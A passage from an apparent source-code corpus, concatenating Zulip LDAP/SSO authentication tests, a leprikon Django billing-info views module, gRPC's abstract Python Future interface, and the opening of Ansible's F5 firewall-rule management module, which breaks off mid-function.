LDAP_APPEND_DOMAIN='zulip.com',
AUTH_LDAP_BIND_PASSWORD='',
AUTH_LDAP_USER_DN_TEMPLATE='uid=%(user)s,ou=users,dc=zulip,dc=com'):
user_profile = self.backend.authenticate(self.example_email("hamlet"), 'testing',
realm_subdomain='acme')
self.assertIs(user_profile, None)
@override_settings(AUTHENTICATION_BACKENDS=('zproject.backends.ZulipLDAPAuthBackend',))
def test_login_failure_due_to_empty_subdomain(self):
# type: () -> None
self.mock_ldap.directory = {
'uid=hamlet,ou=users,dc=zulip,dc=com': {
'userPassword': 'testing'
}
}
with self.settings(
LDAP_APPEND_DOMAIN='zulip.com',
AUTH_LDAP_BIND_PASSWORD='',
AUTH_LDAP_USER_DN_TEMPLATE='uid=%(user)s,ou=users,dc=zulip,dc=com'):
user_profile = self.backend.authenticate(self.example_email("hamlet"), 'testing',
realm_subdomain='')
self.assertIs(user_profile, None)
@override_settings(AUTHENTICATION_BACKENDS=('zproject.backends.ZulipLDAPAuthBackend',))
def test_login_success_when_subdomain_is_none(self):
# type: () -> None
self.mock_ldap.directory = {
'uid=hamlet,ou=users,dc=zulip,dc=com': {
'userPassword': 'testing'
}
}
with self.settings(
LDAP_APPEND_DOMAIN='zulip.com',
AUTH_LDAP_BIND_PASSWORD='',
AUTH_LDAP_USER_DN_TEMPLATE='uid=%(user)s,ou=users,dc=zulip,dc=com'):
user_profile = self.backend.authenticate(self.example_email("hamlet"), 'testing',
realm_subdomain=None)
assert(user_profile is not None)
self.assertEqual(user_profile.email, self.example_email("hamlet"))
@override_settings(AUTHENTICATION_BACKENDS=('zproject.backends.ZulipLDAPAuthBackend',))
def test_login_success_with_valid_subdomain(self):
# type: () -> None
self.mock_ldap.directory = {
'uid=hamlet,ou=users,dc=zulip,dc=com': {
'userPassword': 'testing'
}
}
with self.settings(
LDAP_APPEND_DOMAIN='zulip.com',
AUTH_LDAP_BIND_PASSWORD='',
AUTH_LDAP_USER_DN_TEMPLATE='uid=%(user)s,ou=users,dc=zulip,dc=com'):
user_profile = self.backend.authenticate(self.example_email("hamlet"), 'testing',
realm_subdomain='zulip')
assert(user_profile is not None)
self.assertEqual(user_profile.email, self.example_email("hamlet"))
@override_settings(AUTHENTICATION_BACKENDS=('zproject.backends.ZulipLDAPAuthBackend',))
def test_login_success_when_user_does_not_exist_with_valid_subdomain(self):
# type: () -> None
self.mock_ldap.directory = {
'uid=nonexisting,ou=users,dc=acme,dc=com': {
'cn': ['NonExisting', ],
'userPassword': 'testing'
}
}
with self.settings(
LDAP_APPEND_DOMAIN='acme.com',
AUTH_LDAP_BIND_PASSWORD='',
AUTH_LDAP_USER_DN_TEMPLATE='uid=%(user)s,ou=users,dc=acme,dc=com'):
            user_profile = self.backend.authenticate('nonexisting@acme.com', 'testing',
realm_subdomain='zulip')
assert(user_profile is not None)
            self.assertEqual(user_profile.email, 'nonexisting@acme.com')
self.assertEqual(user_profile.full_name, 'NonExisting')
self.assertEqual(user_profile.realm.string_id, 'zulip')
class TestZulipLDAPUserPopulator(ZulipTestCase):
def test_authenticate(self):
# type: () -> None
backend = ZulipLDAPUserPopulator()
result = backend.authenticate(self.example_email("hamlet"), 'testing') # type: ignore # complains that the function does not return any value!
self.assertIs(result, None)
class TestZulipAuthMixin(ZulipTestCase):
def test_get_user(self):
# type: () -> None
backend = ZulipAuthMixin()
result = backend.get_user(11111)
self.assertIs(result, None)
class TestPasswordAuthEnabled(ZulipTestCase):
def test_password_auth_enabled_for_ldap(self):
# type: () -> None
with self.settings(AUTHENTICATION_BACKENDS=('zproject.backends.ZulipLDAPAuthBackend',)):
realm = Realm.objects.get(string_id='zulip')
self.assertTrue(password_auth_enabled(realm))
class TestRequireEmailFormatUsernames(ZulipTestCase):
def test_require_email_format_usernames_for_ldap_with_append_domain(self):
# type: () -> None
with self.settings(AUTHENTICATION_BACKENDS=('zproject.backends.ZulipLDAPAuthBackend',),
LDAP_APPEND_DOMAIN="zulip.com"):
realm = Realm.objects.get(string_id='zulip')
self.assertFalse(require_email_format_usernames(realm))
def test_require_email_format_usernames_for_ldap_with_email_attr(self):
# type: () -> None
with self.settings(AUTHENTICATION_BACKENDS=('zproject.backends.ZulipLDAPAuthBackend',),
LDAP_EMAIL_ATTR="email"):
realm = Realm.objects.get(string_id='zulip')
self.assertFalse(require_email_format_usernames(realm))
def test_require_email_format_usernames_for_email_only(self):
# type: () -> None
with self.settings(AUTHENTICATION_BACKENDS=('zproject.backends.EmailAuthBackend',)):
realm = Realm.objects.get(string_id='zulip')
self.assertTrue(require_email_format_usernames(realm))
def test_require_email_format_usernames_for_email_and_ldap_with_email_attr(self):
# type: () -> None
with self.settings(AUTHENTICATION_BACKENDS=('zproject.backends.EmailAuthBackend',
'zproject.backends.ZulipLDAPAuthBackend'),
LDAP_EMAIL_ATTR="email"):
realm = Realm.objects.get(string_id='zulip')
self.assertFalse(require_email_format_usernames(realm))
def test_require_email_format_usernames_for_email_and_ldap_with_append_email(self):
# type: () -> None
with self.settings(AUTHENTICATION_BACKENDS=('zproject.backends.EmailAuthBackend',
'zproject.backends.ZulipLDAPAuthBackend'),
LDAP_APPEND_DOMAIN="zulip.com"):
realm = Realm.objects.get(string_id='zulip')
self.assertFalse(require_email_format_usernames(realm))
class TestMaybeSendToRegistration(ZulipTestCase):
def test_sso_only_when_preregistration_user_does_not_exist(self):
# type: () -> None
rf = RequestFactory()
request = rf.get('/')
request.session = {}
request.user = None
# Creating a mock Django form in order to keep the test simple.
        # This form will be returned by the create_homepage_form function
# and will always be valid so that the code that we want to test
# actually runs.
class Form(object):
def is_valid(self):
# type: () -> bool
return True
with self.settings(ONLY_SSO=True):
with mock.patch('zerver.views.auth.HomepageForm', return_value=Form()):
self.assertEqual(PreregistrationUser.objects.all().count(), 0)
result = maybe_send_to_registration(request, self.example_email("hamlet"))
self.assertEqual(result.status_code, 302)
confirmation = Confirmation.objects.all().first()
confirmation_key = confirmation.confirmation_key
self.assertIn('do_confirm/' + confirmation_key, result.url)
self.assertEqual(PreregistrationUser.objects.all().count(), 1)
result = self.client_get(result.url)
self.assert_in_response('action="/accounts/register/"', result)
self.assert_in_response('value="{0}" name="key"'.format(confirmation_key), result)
def test_sso_only_when_preregistration_user_exists(self):
# type: () -> None
rf = RequestFactory()
request = rf.get('/')
request.session = {}
request.user = None
# Creating a mock Django form in order to keep the test simple.
        # This form will be returned by the create_homepage_form function
# and will always be valid so that the code that we want to test
# actually runs.
class Form(object):
def is_valid(self):
# type: () -> bool
return True
email = self.example_email("hamlet")
user = PreregistrationUser(email=email)
user.save()
with self.settings(ONLY_SSO=True):
with mock.patch('zerver.views.auth.HomepageForm', return_value=Form()):
self.assertEqual(PreregistrationUser.objects.all().count(), 1)
result = maybe_send_to_registration(request, email)
self.assertEqual(result.status_code, 302)
confirmation = Confirmation.objects.all().first()
confirmation_key = confirmation.confirmation_key
self.assertIn('do_confirm/' + confirmation_key, result.url)
self.assertEqual(PreregistrationUser.objects.all().count(), 1)
class TestAdminSetBackends(ZulipTestCase):
def test_change_enabled_backends(self):
# type: () -> None
# Log in as admin
self.login(self.example_email("iago"))
result = self.client_patch("/json/realm", {
'authentication_methods': ujson.dumps({u'Email': False, u'Dev': True})})
self.assert_json_success(result)
realm = get_realm('zulip')
self.assertFalse(password_auth_enabled(realm))
self.assertTrue(dev_auth_enabled(realm))
def test_disable_all_backends(self):
# type: () -> None
# Log in as admin
self.login(self.example_email("iago"))
result = self.client_patch("/json/realm", {
'authentication_methods': ujson.dumps({u'Email': False, u'Dev': False})})
self.assert_json_error(result, 'At least one authentication method must be enabled.')
realm = get_realm('zulip')
self.assertTrue(password_auth_enabled(realm))
self.assertTrue(dev_auth_enabled(realm))
def test_supported_backends_only_updated(self):
# type: () -> None
# Log in as admin
self.login(self.example_email("iago"))
# Set some supported and unsupported backends
result = self.client_patch("/json/realm", {
'authentication_methods': ujson.dumps({u'Email': False, u'Dev': True, u'GitHub': False})})
self.assert_json_success(result)
realm = get_realm('zulip')
# Check that unsupported backend is not enabled
self.assertFalse(github_auth_enabled(realm))
self.assertTrue(dev_auth_enabled(realm))
self.assertFalse(password_auth_enabled(realm))
class LoginEmailValidatorTestCase(ZulipTestCase):
def test_valid_email(self):
# type: () -> None
validate_login_email(self.example_email("hamlet"))
def test_invalid_email(self):
# type: () -> None
with self.assertRaises(JsonableError):
validate_login_email(u'hamlet')
class LoginOrRegisterRemoteUserTestCase(ZulipTestCase):
def test_invalid_subdomain(self):
# type: () -> None
full_name = 'Hamlet'
invalid_subdomain = True
user_profile = self.example_user('hamlet')
request = POSTRequestMock({}, user_profile)
response = login_or_register_remote_user(
request,
self.example_email('hamlet'),
user_profile,
full_name=full_name,
invalid_subdomain=invalid_subdomain)
self.assertIn('/accounts/login/?subdomain=1', response.url)
class LDAPBackendTest(ZulipTestCase):
@override_settings(AUTHENTICATION_BACKENDS=('zproject.backends.ZulipLDAPAuthBackend',))
def test_non_existing_realm(self):
# type: () -> None
email = self.example_email('hamlet')
data = {'username': email, 'password': initial_password(email)}
error_type = ZulipLDAPAuthBackend.REALM_IS_NONE_ERROR
error = ZulipLDAPConfigurationError('Realm is None', error_type)
with mock.patch('zproject.backends.ZulipLDAPAuthBackend.get_or_create_user',
side_effect=error), \
mock.patch('django_auth_ldap.backend._LDAPUser._authenticate_user_dn'):
response = self.client_post('/login/', data)
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, reverse('ldap_error_realm_is_none'))
response = self.client_get(response.url)
self.assert_in_response('You are trying to login using LDAP '
'without creating an',
response)
|
leprikon-cz/leprikon | refs/heads/master | leprikon/views/billing_info.py | 1 | from django.utils.translation import ugettext_lazy as _
from ..forms.billing_info import BillingInfoForm
from ..models.roles import BillingInfo
from ..utils import reverse_with_back
from .generic import CreateView, DeleteView, ListView, UpdateView
class GetQerysetMixin:
def get_queryset(self):
return self.request.user.leprikon_billing_info.all()
class BillingInfoListView(GetQerysetMixin, ListView):
add_label = _("add billing information")
preview_template = "leprikon/billing_info_preview.html"
def get_title(self):
return _("Billing information")
def get_add_url(self):
return reverse_with_back(self.request, "leprikon:billing_info_create")
class GetFromKwargsMixin:
def get_form_kwargs(self):
kwargs = super().get_form_kwargs()
kwargs["user"] = self.request.user
return kwargs
class BillingInfoCreateView(GetFromKwargsMixin, GetQerysetMixin, CreateView):
form_class = BillingInfoForm
title = _("New billing information")
def get_message(self):
return _("New billing information {} have been created.").format(self.object)
class BillingInfoUpdateView(GetFromKwargsMixin, GetQerysetMixin, UpdateView):
form_class = BillingInfoForm
message = _("Billing information have been updated.")
title = _("Change billing information")
class BillingInfoDeleteView(GetQerysetMixin, DeleteView):
model = BillingInfo
title = _("Delete billing information")
message = _("Billing information have been deleted.")
def get_question(self):
return _("Do You really want to delete the billing information: {}?").format(self.object)
|
grpc/grpc | refs/heads/master | src/python/grpcio/grpc/framework/foundation/future.py | 48 | # Copyright 2015 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A Future interface.
Python doesn't have a Future interface in its standard library. In the absence
of such a standard, three separate, incompatible implementations
(concurrent.futures.Future, ndb.Future, and asyncio.Future) have appeared. This
interface attempts to be as compatible as possible with
concurrent.futures.Future. From ndb.Future it adopts a traceback-object accessor
method.
Unlike the concrete and implemented Future classes listed above, the Future
class defined in this module is an entirely abstract interface that anyone may
implement and use.
The one known incompatibility between this interface and the interface of
concurrent.futures.Future is that this interface defines its own CancelledError
and TimeoutError exceptions rather than raising the implementation-private
concurrent.futures._base.CancelledError and the
built-in-but-only-in-3.3-and-later TimeoutError.
"""
import abc
import six
class TimeoutError(Exception):
"""Indicates that a particular call timed out."""
class CancelledError(Exception):
"""Indicates that the computation underlying a Future was cancelled."""
class Future(six.with_metaclass(abc.ABCMeta)):
"""A representation of a computation in another control flow.
Computations represented by a Future may be yet to be begun, may be ongoing,
or may have already completed.
"""
# NOTE(nathaniel): This isn't the return type that I would want to have if it
# were up to me. Were this interface being written from scratch, the return
# type of this method would probably be a sum type like:
#
# NOT_COMMENCED
# COMMENCED_AND_NOT_COMPLETED
# PARTIAL_RESULT<Partial_Result_Type>
# COMPLETED<Result_Type>
# UNCANCELLABLE
# NOT_IMMEDIATELY_DETERMINABLE
@abc.abstractmethod
def cancel(self):
"""Attempts to cancel the computation.
This method does not block.
Returns:
True if the computation has not yet begun, will not be allowed to take
place, and determination of both was possible without blocking. False
under all other circumstances including but not limited to the
computation's already having begun, the computation's already having
finished, and the computation's having been scheduled for execution on a
remote system for which a determination of whether or not it commenced
before being cancelled cannot be made without blocking.
"""
raise NotImplementedError()
# NOTE(nathaniel): Here too this isn't the return type that I'd want this
# method to have if it were up to me. I think I'd go with another sum type
# like:
#
# NOT_CANCELLED (this object's cancel method hasn't been called)
# NOT_COMMENCED
# COMMENCED_AND_NOT_COMPLETED
# PARTIAL_RESULT<Partial_Result_Type>
# COMPLETED<Result_Type>
# UNCANCELLABLE
# NOT_IMMEDIATELY_DETERMINABLE
#
# Notice how giving the cancel method the right semantics obviates most
# reasons for this method to exist.
@abc.abstractmethod
def cancelled(self):
"""Describes whether the computation was cancelled.
This method does not block.
Returns:
True if the computation was cancelled any time before its result became
immediately available. False under all other circumstances including but
not limited to this object's cancel method not having been called and
the computation's result having become immediately available.
"""
raise NotImplementedError()
@abc.abstractmethod
def running(self):
"""Describes whether the computation is taking place.
This method does not block.
Returns:
True if the computation is scheduled to take place in the future or is
taking place now, or False if the computation took place in the past or
was cancelled.
"""
raise NotImplementedError()
# NOTE(nathaniel): These aren't quite the semantics I'd like here either. I
# would rather this only returned True in cases in which the underlying
# computation completed successfully. A computation's having been cancelled
# conflicts with considering that computation "done".
@abc.abstractmethod
def done(self):
"""Describes whether the computation has taken place.
This method does not block.
Returns:
True if the computation is known to have either completed or have been
unscheduled or interrupted. False if the computation may possibly be
executing or scheduled to execute later.
"""
raise NotImplementedError()
@abc.abstractmethod
def result(self, timeout=None):
"""Accesses the outcome of the computation or raises its exception.
This method may return immediately or may block.
Args:
timeout: The length of time in seconds to wait for the computation to
finish or be cancelled, or None if this method should block until the
computation has finished or is cancelled no matter how long that takes.
Returns:
The return value of the computation.
Raises:
TimeoutError: If a timeout value is passed and the computation does not
terminate within the allotted time.
CancelledError: If the computation was cancelled.
Exception: If the computation raised an exception, this call will raise
the same exception.
"""
raise NotImplementedError()
@abc.abstractmethod
def exception(self, timeout=None):
"""Return the exception raised by the computation.
This method may return immediately or may block.
Args:
timeout: The length of time in seconds to wait for the computation to
terminate or be cancelled, or None if this method should block until
the computation is terminated or is cancelled no matter how long that
takes.
Returns:
The exception raised by the computation, or None if the computation did
not raise an exception.
Raises:
TimeoutError: If a timeout value is passed and the computation does not
terminate within the allotted time.
CancelledError: If the computation was cancelled.
"""
raise NotImplementedError()
@abc.abstractmethod
def traceback(self, timeout=None):
"""Access the traceback of the exception raised by the computation.
This method may return immediately or may block.
Args:
timeout: The length of time in seconds to wait for the computation to
terminate or be cancelled, or None if this method should block until
the computation is terminated or is cancelled no matter how long that
takes.
Returns:
The traceback of the exception raised by the computation, or None if the
computation did not raise an exception.
Raises:
TimeoutError: If a timeout value is passed and the computation does not
terminate within the allotted time.
CancelledError: If the computation was cancelled.
"""
raise NotImplementedError()
@abc.abstractmethod
def add_done_callback(self, fn):
"""Adds a function to be called at completion of the computation.
The callback will be passed this Future object describing the outcome of
the computation.
If the computation has already completed, the callback will be called
immediately.
Args:
fn: A callable taking this Future object as its single parameter.
"""
raise NotImplementedError()
|
drawks/ansible | refs/heads/devel | lib/ansible/modules/network/f5/bigip_firewall_rule.py | 14 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright: (c) 2018, F5 Networks Inc.
# GNU General Public License v3.0 (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'certified'}
DOCUMENTATION = r'''
---
module: bigip_firewall_rule
short_description: Manage AFM Firewall rules
description:
- Manages firewall rules in an AFM firewall policy. New rules will always be added to the
end of the policy. Rules can be re-ordered using the C(bigip_security_policy) module.
Rules can also be pre-ordered using the C(bigip_security_policy) module and then later
updated using the C(bigip_firewall_rule) module.
version_added: 2.7
options:
name:
description:
- Specifies the name of the rule.
type: str
required: True
parent_policy:
description:
- The policy which contains the rule to be managed.
- One of either C(parent_policy) or C(parent_rule_list) is required.
type: str
parent_rule_list:
description:
- The rule list which contains the rule to be managed.
- One of either C(parent_policy) or C(parent_rule_list) is required.
type: str
action:
description:
- Specifies the action for the firewall rule.
- When C(accept), allows packets with the specified source, destination,
and protocol to pass through the firewall. Packets that match the rule,
and are accepted, traverse the system as if the firewall is not present.
- When C(drop), drops packets with the specified source, destination, and
protocol. Dropping a packet is a silent action with no notification to
the source or destination systems. Dropping the packet causes the connection
to be retried until the retry threshold is reached.
- When C(reject), rejects packets with the specified source, destination,
and protocol. When a packet is rejected the firewall sends a destination
unreachable message to the sender.
- When C(accept-decisively), allows packets with the specified source,
destination, and protocol to pass through the firewall, and does not require
any further processing by any of the further firewalls. Packets that match
the rule, and are accepted, traverse the system as if the firewall is not
present. If the Rule List is applied to a virtual server, management IP,
or self IP firewall rule, then Accept Decisively is equivalent to Accept.
- When creating a new rule, if this parameter is not provided, the default is
C(reject).
type: str
choices:
- accept
- drop
- reject
- accept-decisively
status:
description:
- Indicates the activity state of the rule or rule list.
- When C(disabled), specifies that the rule or rule list does not apply at all.
- When C(enabled), specifies that the system applies the firewall rule or rule
list to the given context and addresses.
- When C(scheduled), specifies that the system applies the rule or rule list
according to the specified schedule.
- When creating a new rule, if this parameter is not provided, the default
is C(enabled).
type: str
choices:
- enabled
- disabled
- scheduled
schedule:
description:
- Specifies a schedule for the firewall rule.
- You configure schedules to define days and times when the firewall rule is
made active.
type: str
description:
description:
- The rule description.
type: str
irule:
description:
- Specifies an iRule that is applied to the firewall rule.
- An iRule can be started when the firewall rule matches traffic.
type: str
protocol:
description:
- Specifies the protocol to which the rule applies.
- Protocols may be specified by either their name or numeric value.
- A special protocol value C(any) can be specified to match any protocol. The
numeric equivalent of this protocol is C(255).
type: str
source:
description:
- Specifies packet sources to which the rule applies.
- Leaving this field blank applies the rule to all addresses and all ports.
- You can specify the following source items. An IPv4 or IPv6 address, an IPv4
or IPv6 address range, geographic location, VLAN, address list, port,
port range, port list or address list.
- You can specify a mix of different types of items for the source address.
suboptions:
address:
description:
- Specifies a specific IP address.
type: str
address_list:
description:
- Specifies an existing address list.
type: str
address_range:
description:
- Specifies an address range.
type: str
country:
description:
- Specifies a country code.
type: str
port:
description:
- Specifies a single numeric port.
- This option is only valid when C(protocol) is C(tcp)(6) or C(udp)(17).
type: int
port_list:
description:
          - Specifies an existing port list.
- This option is only valid when C(protocol) is C(tcp)(6) or C(udp)(17).
type: str
port_range:
description:
- Specifies a range of ports, which is two port values separated by
a hyphen. The port to the left of the hyphen should be less than the
port to the right.
- This option is only valid when C(protocol) is C(tcp)(6) or C(udp)(17).
type: str
vlan:
description:
- Specifies VLANs to which the rule applies.
- The VLAN source refers to the packet's source.
type: str
type: list
destination:
description:
- Specifies packet destinations to which the rule applies.
- Leaving this field blank applies the rule to all addresses and all ports.
- You can specify the following destination items. An IPv4 or IPv6 address,
an IPv4 or IPv6 address range, geographic location, VLAN, address list, port,
port range, port list or address list.
      - You can specify a mix of different types of items for the destination address.
suboptions:
address:
description:
- Specifies a specific IP address.
type: str
address_list:
description:
- Specifies an existing address list.
type: str
address_range:
description:
- Specifies an address range.
type: str
country:
description:
- Specifies a country code.
type: str
port:
description:
- Specifies a single numeric port.
- This option is only valid when C(protocol) is C(tcp)(6) or C(udp)(17).
type: int
port_list:
description:
          - Specifies an existing port list.
- This option is only valid when C(protocol) is C(tcp)(6) or C(udp)(17).
type: str
port_range:
description:
- Specifies a range of ports, which is two port values separated by
a hyphen. The port to the left of the hyphen should be less than the
port to the right.
- This option is only valid when C(protocol) is C(tcp)(6) or C(udp)(17).
type: str
type: list
logging:
description:
- Specifies whether logging is enabled or disabled for the firewall rule.
- When creating a new rule, if this parameter is not specified, the default
        is C(no).
type: bool
rule_list:
description:
- Specifies an existing rule list to use in the rule.
- This parameter is mutually exclusive with many of the other individual-rule
        specific settings. This includes C(logging), C(action), C(source),
        C(destination), C(irule), and C(protocol).
type: str
icmp_message:
description:
- Specifies the Internet Control Message Protocol (ICMP) or ICMPv6 message
C(type) and C(code) that the rule uses.
- This parameter is only relevant when C(protocol) is either C(icmp)(1) or
C(icmpv6)(58).
suboptions:
type:
description:
- Specifies the type of ICMP message.
- You can specify control messages, such as Echo Reply (0) and Destination
Unreachable (3), or you can specify C(any) to indicate that the system
applies the rule for all ICMP messages.
- You can also specify an arbitrary ICMP message.
- The ICMP protocol contains definitions for the existing message type and
number pairs.
type: str
code:
description:
- Specifies the code returned in response to the specified ICMP message type.
- You can specify codes, each set appropriate to the associated type, such
as No Code (0) (associated with Echo Reply (0)) and Host Unreachable (1)
(associated with Destination Unreachable (3)), or you can specify C(any)
to indicate that the system applies the rule for all codes in response to
that specific ICMP message.
- You can also specify an arbitrary code.
- The ICMP protocol contains definitions for the existing message code and
number pairs.
type: str
type: list
partition:
description:
- Device partition to manage resources on.
type: str
default: Common
state:
description:
- When C(state) is C(present), ensures that the rule exists.
- When C(state) is C(absent), ensures that the rule is removed.
type: str
choices:
- present
- absent
default: present
extends_documentation_fragment: f5
author:
- Tim Rupp (@caphrim007)
- Wojciech Wypior (@wojtek0806)
'''
EXAMPLES = r'''
- name: Create a new rule in the foo firewall policy
bigip_firewall_rule:
name: foo
parent_policy: policy1
protocol: tcp
source:
- address: 1.2.3.4
- address: "::1"
- address_list: foo-list1
- address_range: 1.1.1.1-2.2.2.2
- vlan: vlan1
- country: US
- port: 22
- port_list: port-list1
- port_range: 80-443
destination:
- address: 1.2.3.4
- address: "::1"
- address_list: foo-list1
- address_range: 1.1.1.1-2.2.2.2
- country: US
- port: 22
- port_list: port-list1
- port_range: 80-443
irule: irule1
action: accept
logging: yes
provider:
password: secret
server: lb.mydomain.com
user: admin
delegate_to: localhost
- name: Create an ICMP specific rule
bigip_firewall_rule:
name: foo
protocol: icmp
icmp_message:
type: 0
source:
- country: US
action: drop
logging: yes
provider:
password: secret
server: lb.mydomain.com
user: admin
delegate_to: localhost
- name: Add a new rule that uses an existing rule list
bigip_firewall_rule:
name: foo
rule_list: rule-list1
provider:
password: secret
server: lb.mydomain.com
user: admin
delegate_to: localhost
'''
RETURN = r'''
name:
description: Name of the rule.
returned: changed
type: str
sample: FooRule
parent_policy:
description: The policy which contains the rule to be managed.
returned: changed
type: str
sample: FooPolicy
parent_rule_list:
description: The rule list which contains the rule to be managed.
returned: changed
type: str
sample: FooRuleList
action:
description: The action for the firewall rule.
returned: changed
type: str
sample: drop
status:
description: The activity state of the rule or rule list.
returned: changed
type: str
sample: scheduled
schedule:
description: The schedule for the firewall rule.
returned: changed
type: str
sample: Foo_schedule
description:
description: The rule description.
returned: changed
type: str
sample: MyRule
irule:
description: The iRule that is applied to the firewall rule.
returned: changed
type: str
sample: _sys_auth_radius
protocol:
description: The protocol to which the rule applies.
returned: changed
type: str
sample: any
source:
  description: The packet sources to which the rule applies.
returned: changed
type: complex
contains:
address:
description: A specific IP address.
returned: changed
type: str
sample: 192.168.1.1
address_list:
description: An existing address list.
returned: changed
type: str
sample: foo-list1
address_range:
description: The address range.
returned: changed
type: str
sample: 1.1.1.1-2.2.2.2
country:
description: A country code.
returned: changed
type: str
sample: US
port:
description: Single numeric port.
returned: changed
type: int
sample: 8080
port_list:
description: An existing port list.
returned: changed
type: str
sample: port-list1
port_range:
description: The port range.
returned: changed
type: str
sample: 80-443
vlan:
description: Source VLANs for the packets.
returned: changed
type: str
sample: vlan1
sample: hash/dictionary of values
destination:
description: The packet destinations to which the rule applies.
returned: changed
type: complex
contains:
address:
description: A specific IP address.
returned: changed
type: str
sample: 192.168.1.1
address_list:
description: An existing address list.
returned: changed
type: str
sample: foo-list1
address_range:
description: The address range.
returned: changed
type: str
sample: 1.1.1.1-2.2.2.2
country:
description: A country code.
returned: changed
type: str
sample: US
port:
description: Single numeric port.
returned: changed
type: int
sample: 8080
port_list:
description: An existing port list.
returned: changed
type: str
sample: port-list1
port_range:
description: The port range.
returned: changed
type: str
sample: 80-443
sample: hash/dictionary of values
logging:
  description: Enable or disable logging for the firewall rule.
returned: changed
type: bool
sample: yes
rule_list:
description: An existing rule list to use in the rule.
returned: changed
type: str
sample: rule-list-1
icmp_message:
  description: The ICMP or ICMPv6 message C(type) and C(code) that the rule uses.
returned: changed
type: complex
contains:
type:
description: The type of ICMP message.
returned: changed
type: str
sample: 0
code:
description: The code returned in response to the specified ICMP message type.
returned: changed
type: str
sample: 1
sample: hash/dictionary of values
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.basic import env_fallback
try:
from library.module_utils.network.f5.bigip import F5RestClient
from library.module_utils.network.f5.common import F5ModuleError
from library.module_utils.network.f5.common import AnsibleF5Parameters
from library.module_utils.network.f5.common import fq_name
from library.module_utils.network.f5.common import f5_argument_spec
from library.module_utils.network.f5.common import transform_name
except ImportError:
from ansible.module_utils.network.f5.bigip import F5RestClient
from ansible.module_utils.network.f5.common import F5ModuleError
from ansible.module_utils.network.f5.common import AnsibleF5Parameters
from ansible.module_utils.network.f5.common import fq_name
from ansible.module_utils.network.f5.common import f5_argument_spec
from ansible.module_utils.network.f5.common import transform_name
class Parameters(AnsibleF5Parameters):
api_map = {
'ipProtocol': 'protocol',
'log': 'logging',
'icmp': 'icmp_message',
}
api_attributes = [
'irule',
'ipProtocol',
'log',
'schedule',
'status',
'destination',
'source',
'icmp',
'action',
'description',
]
returnables = [
'logging',
'protocol',
'irule',
'source',
'destination',
'action',
'status',
'schedule',
'description',
'icmp_message',
]
updatables = [
'logging',
'protocol',
'irule',
'source',
'destination',
'action',
'status',
'schedule',
'description',
'icmp_message',
]
protocol_map = {
'1': 'icmp',
'6': 'tcp',
'17': 'udp',
'58': 'icmpv6',
'255': 'any',
}
class ApiParameters(Parameters):
@property
def logging(self):
if self._values['logging'] is None:
return None
if self._values['logging'] == 'yes':
return True
return False
@property
def protocol(self):
if self._values['protocol'] is None:
return None
if self._values['protocol'] in self.protocol_map:
return self.protocol_map[self._values['protocol']]
return self._values['protocol']
@property
def source(self):
result = []
if self._values['source'] is None:
return None
v = self._values['source']
if 'addressLists' in v:
result += [('address_list', x) for x in v['addressLists']]
if 'vlans' in v:
result += [('vlan', x) for x in v['vlans']]
if 'geo' in v:
result += [('geo', x['name']) for x in v['geo']]
if 'addresses' in v:
result += [('address', x['name']) for x in v['addresses']]
if 'ports' in v:
result += [('port', str(x['name'])) for x in v['ports']]
if 'portLists' in v:
result += [('port_list', x) for x in v['portLists']]
if result:
return result
return None
@property
def destination(self):
result = []
if self._values['destination'] is None:
return None
v = self._values['destination']
if 'addressLists' in v:
result += [('address_list', x) for x in v['addressLists']]
if 'geo' in v:
result += [('geo', x['name']) for x in v['geo']]
if 'addresses' in v:
result += [('address', x['name']) for x in v['addresses']]
if 'ports' in v:
result += [('port', x['name']) for x in v['ports']]
if 'portLists' in v:
result += [('port_list', x) for x in v['portLists']]
if result:
return result
return None
@property
def icmp_message(self):
if self._values['icmp_message'] is None:
return None
result = [x['name'] for x in self._values['icmp_message']]
return result
class ModuleParameters(Parameters):
@property
def irule(self):
if self._values['irule'] is None:
return None
if self._values['irule'] == '':
return ''
return fq_name(self.partition, self._values['irule'])
@property
def description(self):
if self._values['description'] is None:
return None
if self._values['description'] == '':
return ''
return self._values['description']
@property
def schedule(self):
if self._values['schedule'] is None:
return None
if self._values['schedule'] == '':
return ''
return fq_name(self.partition, self._values['schedule'])
@property
def source(self):
result = []
if self._values['source'] is None:
return None
for x in self._values['source']:
if 'address' in x and x['address'] is not None:
result += [('address', x['address'])]
elif 'address_range' in x and x['address_range'] is not None:
result += [('address', x['address_range'])]
elif 'address_list' in x and x['address_list'] is not None:
result += [('address_list', x['address_list'])]
elif 'country' in x and x['country'] is not None:
result += [('geo', x['country'])]
elif 'vlan' in x and x['vlan'] is not None:
result += [('vlan', fq_name(self.partition, x['vlan']))]
elif 'port' in x and x['port'] is not None:
result += [('port', str(x['port']))]
elif 'port_range' in x and x['port_range'] is not None:
result += [('port', x['port_range'])]
elif 'port_list' in x and x['port_list'] is not None:
result += [('port_list', fq_name(self.partition, x['port_list']))]
if result:
return result
return None
@property
def destination(self):
result = []
if self._values['destination'] is None:
return None
for x in self._values['destination']:
if 'address' in x and x['address'] is not None:
result += [('address', x['address'])]
elif 'address_range' in x and x['address_range'] is not None:
result += [('address', x['address_range'])]
elif 'address_list' in x and x['address_list'] is not None:
result += [('address_list', x['address_list'])]
elif 'country' in x and x['country'] is not None:
result += [('geo', x['country'])]
elif 'port' in x and x['port'] is not None:
result += [('port', str(x['port']))]
elif 'port_range' in x and x['port_range'] is not None:
result += [('port', x['port_range'])]
elif 'port_list' in x and x['port_list'] is not None:
result += [('port_list', fq_name(self.partition, x['port_list']))]
if result:
return result
return None
@property
def icmp_message(self):
if self._values['icmp_message'] is None:
return None
result = []
for x in self._values['icmp_message']:
type = x.get('type', '255')
code = x.get('code', '255')
if type is None or type == 'any':
type = '255'
if code is None or code == 'any':
code = '255'
